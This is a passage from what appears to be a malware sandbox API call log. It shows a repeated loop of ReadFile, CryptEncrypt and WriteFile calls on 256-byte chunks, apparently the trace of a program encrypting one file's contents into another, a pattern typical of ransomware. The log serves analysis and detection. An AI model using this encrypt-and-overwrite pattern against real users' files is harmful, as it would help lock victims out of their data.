lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.433] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.433] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.433] GetLastError () returned 0x0 [0144.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.433] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.433] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.433] GetLastError () returned 0x0 [0144.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.433] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.433] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.433] GetLastError () returned 0x0 [0144.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.433] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.434] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.434] GetLastError () returned 0x0 [0144.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.434] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.434] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.434] GetLastError () returned 0x0 [0144.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.434] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.434] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.434] GetLastError () returned 0x0 [0144.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.434] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.434] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.434] GetLastError () returned 0x0 [0144.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.434] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.434] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.434] GetLastError () returned 0x0 [0144.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.434] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.434] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.434] GetLastError () returned 0x0 [0144.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.434] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.434] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.435] GetLastError () returned 0x0 [0144.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.435] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.435] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.435] GetLastError () returned 0x0 [0144.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.435] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.435] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.435] GetLastError () returned 0x0 [0144.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.435] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.435] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.435] GetLastError () returned 0x0 [0144.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.435] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.435] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.435] GetLastError () returned 0x0 [0144.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.435] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.435] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.435] GetLastError () returned 0x0 [0144.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.435] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.435] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.435] GetLastError () returned 0x0 [0144.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.436] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.436] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.436] GetLastError () returned 0x0 [0144.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.436] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.436] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.436] GetLastError () returned 0x0 [0144.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.436] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.436] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.436] GetLastError () returned 0x0 [0144.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.436] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.436] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.436] GetLastError () returned 0x0 [0144.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.436] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.436] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.436] GetLastError () returned 0x0 [0144.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.436] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.436] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.436] GetLastError () returned 0x0 [0144.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.436] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.437] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.437] GetLastError () returned 0x0 [0144.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.437] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.437] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.437] GetLastError () returned 0x0 [0144.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.437] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.437] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.437] GetLastError () returned 0x0 [0144.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.437] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.437] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.437] GetLastError () returned 0x0 [0144.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.437] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.437] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.437] GetLastError () returned 0x0 [0144.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.437] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.437] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.437] GetLastError () returned 0x0 [0144.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.437] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.437] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.437] GetLastError () returned 0x0 [0144.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.438] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.438] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.438] GetLastError () returned 0x0 [0144.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.438] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.438] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.438] GetLastError () returned 0x0 [0144.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.438] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.438] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.438] GetLastError () returned 0x0 [0144.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.438] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, 